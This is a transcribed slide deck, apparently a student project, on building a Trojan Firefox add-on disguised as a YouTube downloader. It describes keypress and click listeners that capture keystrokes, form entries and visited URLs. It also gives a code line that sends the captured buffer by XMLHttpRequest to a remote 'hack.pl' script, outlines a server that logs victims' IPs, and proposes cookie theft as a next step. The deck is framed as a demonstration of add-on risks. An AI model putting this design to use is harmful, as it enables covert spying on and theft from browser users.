A Simple Trojan Mozilla Firefox Add-on

3,494 views

Published on

A Simple Trojan Mozilla Firefox Add-on - Our Project Presentation on how to make a Trojan Addon for Firefox.

For Education Purpose Only. No one is encouraged to undergo unethical engineering. This is to show that there can be vulnerabilities.

We have edited the GOOD existing addon and added some trojan code.

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
3,494
On SlideShare
0
From Embeds
0
Number of Embeds
38
Actions
Shares
0
Downloads
0
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

A Simple Trojan Mozilla Firefox Add-on

  1. 1. Presented by Suresh K Abin John George Nimish Joseph Bairaginath Behera Arunanand T AM.Tech. 2011-13 CSE, Dept. of CSE, NIT Calicut, Kerala, IN, 673 601
  2. 2. Introduction  What’s an add-on?  That adds some feature to the existing system  What’s a Trojan?  That looks useful, but does unfavorable actions without our knowledge11/16/2011 Dept. of CSE, NIT Calicut 2
  3. 3. Overview  Existing Add-on vs Ours  Our Add-on: Features  Challenges & Design  Working as an abstraction  Demonstration  Conclusions  References11/16/2011 Dept. of CSE, NIT Calicut 3
  4. 4. Abstract  Our add-on works as a normal YouTube video downloader, but it is a Trojan  It will capture your web activities like URLs visited, web form entries, etc. and shall send to a remote server  It will, at the server, identify and store the IPs of the hosts11/16/2011 Dept. of CSE, NIT Calicut 4
  5. 5. Existing Add-on vs Our Add-on  Easy YouTube Downloader [1]  Helps download videos from YouTube  We modified the source and added some js into the source11/16/2011 Dept. of CSE, NIT Calicut 5
  6. 6. Features of our Add-on  Still, works as YouTube Downloader  Monitor click [2] and keyboard[2] events  Sends all the URLs visited and events, which’s first stored in a buffer variable  Keeps track of IP address of hosts, at the server11/16/2011 Dept. of CSE, NIT Calicut 6
  7. 7. System Requirements  Operating System: Windows/Linux  Browser: Mozilla Firefox 1.5+  Javascript Enabled [3]11/16/2011 Dept. of CSE, NIT Calicut 7
  8. 8. Challenges  Understanding the working of existing add-on.  Where and how to modify the add-on?  How to add event listeners?  How to send captured information to the remote server?11/16/2011 Dept. of CSE, NIT Calicut 8
  9. 9. Design  We added some blocks of codes into “script- compiler.js” file  The following methods/functions were created:  Two Event Listeners – KeyPress and Click to the window object  sendHref(href)  addKey(Event)  clickBuff(Event)  sendBUFF(BUFF)11/16/2011 Dept. of CSE, NIT Calicut 9
  10. 10. Design – Contd…  Two Event Listeners – KeyPress and Click to the window object  WinObj.addEventListener("keypress", function(event){ BUFF.addKey(event); }, true); [4]  WinObj.addEventListener("click", function(event){ CLICK.Event(event); }, true); [4]11/16/2011 Dept. of CSE, NIT Calicut 10
  11. 11. Design – Contd…  Retrieve href from window object  sendHref(href) If href != "about:blank” then Add href to the buffer Call sendBuff() function11/16/2011 Dept. of CSE, NIT Calicut 11
  12. 12. Design – Contd…  addKey(Event)  This is an key event handler function  Once a key is pressed, this function will be automatically called (Callback function)  From the Event object, we can extract key-press information  Add this key to the buffer11/16/2011 Dept. of CSE, NIT Calicut 12
  13. 13. Design – Contd…  clickBuff (Event)  Why we included this clickBuff()?  This is a click event handler function  Once a click happens, observe its click target  Store the click target in buffer  While submit event happens, we will fetch the target values of click events stored.11/16/2011 Dept. of CSE, NIT Calicut 13
  14. 14. Design – Contd…  sendBuff(buff)  Using Ajax (XMLHttpRequest)  If buff is full or submit event happens, buff is sent to the server  var req = new XMLHttpRequest();  req.open("GET", "http://www.mamboo.in/cgi- bin/hack.pl?keys=" + hack, true);11/16/2011 Dept. of CSE, NIT Calicut 14
  15. 15. Working as an abstraction11/16/2011 Dept. of CSE, NIT Calicut 15
  16. 16. Server Side Set-up  A Perl file for Receiving ‘buffer’ data  Writes to the text file at the server  $ENV{} hash of Perl (QUERY_STRING and REMOTE_ADDR)  Timestamp and IP Information is retrieved and stored11/16/2011 Dept. of CSE, NIT Calicut 16
  17. 17. As a package…  Available as an .xpi package  Open the file using Mozilla Firefox  Restart, and start using11/16/2011 Dept. of CSE, NIT Calicut 17
  18. 18. Demonstration  We will now have a demonstration of our project http://www.youtube.com/watch?v=WiVZ8dI2stc11/16/2011 Dept. of CSE, NIT Calicut 18
  19. 19. Future Enhancements  We can enhance the server side for further processing of retrieved information  Browser cookie details can be accessed11/16/2011 Dept. of CSE, NIT Calicut 19
  20. 20. Conclusions  The project aimed at creating a trojan add-on, which is successfully completed  This project is intended for revealing the vulnerabilities caused by untrusted add-ons11/16/2011 Dept. of CSE, NIT Calicut 20
  21. 21. References [1] https://addons.mozilla.org/ [2]https://developer.mozilla.org/En/Developing_add- ons [3] http://www.rietta.com/firefox/index.html [4] Kenneth C., Programming Firefox, O’Reilly, 2007 [5] http://www.google.com11/16/2011 Dept. of CSE, NIT Calicut 21
  22. 22. Visit…  Comprehensive details of our project is available at (Requires Login): https://sites.google.com/site/nitcmtech2013cs/semester -1/is-project-sem1/trojan Or shortly, http://tinyurl.com/taddon11/16/2011 Dept. of CSE, NIT Calicut 22
  23. 23. Queries???11/16/2011 Dept. of CSE, NIT Calicut 23
  24. 24. Thank You… Contact: sureshk.gec@gmail.com abinjohn2008@gmail.com nimishjoseph@gmail.com mail2bairagi@gmail.com arunta007@gmail.com11/16/2011 Dept. of CSE, NIT Calicut 24

×